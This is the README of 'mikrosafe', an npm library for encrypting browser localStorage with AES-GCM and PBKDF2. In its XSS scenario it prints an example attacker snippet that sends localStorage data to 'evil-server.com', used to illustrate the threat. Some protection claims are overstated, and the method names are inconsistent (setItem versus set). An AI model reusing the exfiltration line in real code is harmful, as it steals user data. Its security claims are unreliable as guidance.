UNPKG

mikrosafe

Version:

Encrypt and decrypt your LocalStorage data, simply and securely.

github.com/mikaelvesavuori/mikrosafe

mikaelvesavuori/mikrosafe

192 lines (126 loc) 7.61 kB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
# MikroSafe **Encrypt and decrypt your LocalStorage data — simply and securely**. [![npm version](https://img.shields.io/npm/v/mikrosafe.svg)](https://www.npmjs.com/package/mikrosafe) [![bundle size](https://img.shields.io/bundlephobia/minzip/mikrosafe)](https://bundlephobia.com/package/mikrosafe) ![Build Status](https://github.com/mikaelvesavuori/mikrosafe/workflows/main/badge.svg) [![License: MIT](https://img.shields.io/badge/License-MIT-blue.svg)](https://opensource.org/licenses/MIT) --- A lightweight (less than 1KB gzipped), zero-dependency library for securely storing data in browsers using true AES-GCM encryption. ## Example See the [MikroSafe example site](https://mikrosafe-example.netlify.app) or the `example` directory in this repo. ## Installation With HTML, loading MikroSafe from your local files: ```html <script src="path/to/mikrosafe.min.js"></script> ``` Or via npm: ```bash npm install mikrosafe -S ``` ## Quick Start ```javascript // Create a storage instance with a custom password const storage = new MikroSafe('my-secure-password'); // Store data await storage.setItem('userProfile', { name: 'John Doe', email: 'john@example.com', isActive: true }); // Retrieve data const profile = await storage.getItem('userProfile'); // Remove data storage.removeItem('userProfile'); // Clear all data storage.clear(); ``` ## Why MikroSafe? Web applications frequently store sensitive user data in the browser's localStorage for offline functionality and improved performance. However, localStorage is inherently insecure: - Data is stored in **plain text**. - Accessible to **any JavaScript** running on the same domain. - Vulnerable to **XSS attacks** and **malicious browser extensions**. - Exposed in plain text during **browser memory dumps**. MikroSafe addresses these security vulnerabilities by implementing true encryption using the [Web Crypto API](https://developer.mozilla.org/en-US/docs/Web/API/Web_Crypto_API), ensuring your data remains protected even if compromised. ### What about other options? There are some number of alternatives out in the open for encrypting and decrypting LocalStorage. What MikroSafe does is to: - **Focus on security using actual encryption**: This is not the case for all other options, at least not without manually providing your own crypto. - **Lightweight**: Minimalist implementation with fewer unneeded bells and whistles. - **Modern implementation**: Make it nice and easy for contributors to work with. ## Security Benefits ### Industry-Standard Encryption MikroSafe uses [AES-GCM 256-bit encryption](https://en.wikipedia.org/wiki/Galois/Counter_Mode) (the gold standard for symmetric encryption) provided by the browser's built-in Web Crypto API to protect your data: - **AES-GCM:** A highly secure authenticated encryption mode. - **PBKDF2:** Password-based key derivation with 100,000 iterations for protection against brute force attacks. - **Unique IV:** Generated for each encryption operation to prevent replay attacks. ### Protection Against Common Attack Vectors | Attack Vector | Plain localStorage | MikroSafe | |-------------------------|----------------------------------------------|--------------------------------------------------| | XSS Attacks | ❌ Attackers can read all data via JavaScript | ✅ Encrypted data is useless without the password | | Browser Extensions | ❌ Extensions can access all data | ✅ Data is encrypted and unreadable | | Local Access | ❌ Anyone with physical access can view data | ✅ Data is encrypted in browser storage | | Man-in-the-Middle | ❌ Clear text if intercepted via HTTP | ✅ Already encrypted before transmission | | Browser Developer Tools | ❌ Plainly visible in Storage tab | ✅ Only encrypted ciphertext is visible | | Memory Dumps | ❌ Data visible in browser memory | ✅ Only encrypted when in localStorage | ### Default Password & Security Even with the default password, MikroSafe provides significant security improvements: 1. **Defense in Depth:** Adding encryption creates an additional security layer that attackers must overcome. 2. **Security Through Obscurity:** While not a primary security measure, encryption prevents casual data inspection. 3. **Obfuscation vs. Nothing:** Encrypted data with a default password is still more secure than plaintext data. 4. **Custom Password Implementation:** For production applications, using a custom user-provided password dramatically increases security. **Remember**: The strongest security comes from using custom, user-provided passwords. _The default password is meant for development and should be replaced in production environments._ ## Comparing Real-World Security Scenarios ### Scenario 1: XSS Attack If an attacker manages to inject malicious JavaScript: **With plain localStorage:** ```javascript // Attacker can immediately access sensitive data const userData = localStorage.getItem('userProfile'); // Send to attacker's server fetch('https://evil-server.com/steal', { method: 'POST', body: userData }); ``` **With MikroSafe:** ```javascript // Attacker gets only encrypted data const encryptedData = localStorage.getItem('userProfile'); // Data is useless without the encryption password // e.g.: "U2FsdGVkX18kVrd2JtrPQbGae6w92H/1OJswGFFzZ8w8P3..." ``` ### Scenario 2: Malicious Browser Extension **With plain localStorage:** Browser extensions with storage permissions can read all localStorage data in plain text, potentially accessing sensitive user information. **With MikroSafe:** Extensions still see only the encrypted data, which is useless without the encryption key. ### Scenario 3: Physical Device Access If someone gains access to a user's device: **With plain localStorage:** Opening developer tools shows all stored data in readable format. **With MikroSafe:** Data appears as encrypted strings, unreadable without the password. ## Recommendations for Maximum Security 1. **Use unique passwords:** Create a unique encryption password, ideally derived from static but not-easily-known data. 2. **Custom salt:** Provide a custom salt value rather than using the default. 3. **Secure password management:** Never store the encryption password in localStorage or sessionStorage. 4. **Limited data lifetime:** Only store sensitive data as long as necessary. ## API Reference ### Constructor ```javascript const storage = new MikroSafe(password, options); ``` | Parameter | Type | Description | |--------------|-------------------|----------------------------------------------| | password | string | The password used for encryption/decryption | | options | object | Optional configuration settings | | options.salt | string/Uint8Array | Custom salt for key derivation (recommended) | ### Methods | Method | Parameters | Return | Description | |--------|--------------|------------------|-------------------------------| | set | (key, value) | Promise<void> | Encrypts and stores data | | get | (key) | Promise<T\|null> | Retrieves and decrypts data | | remove | (key) | void | Removes an item from storage | | clear | () | void | Clears all items from storage | ## License MIT. See the `LICENSE` file.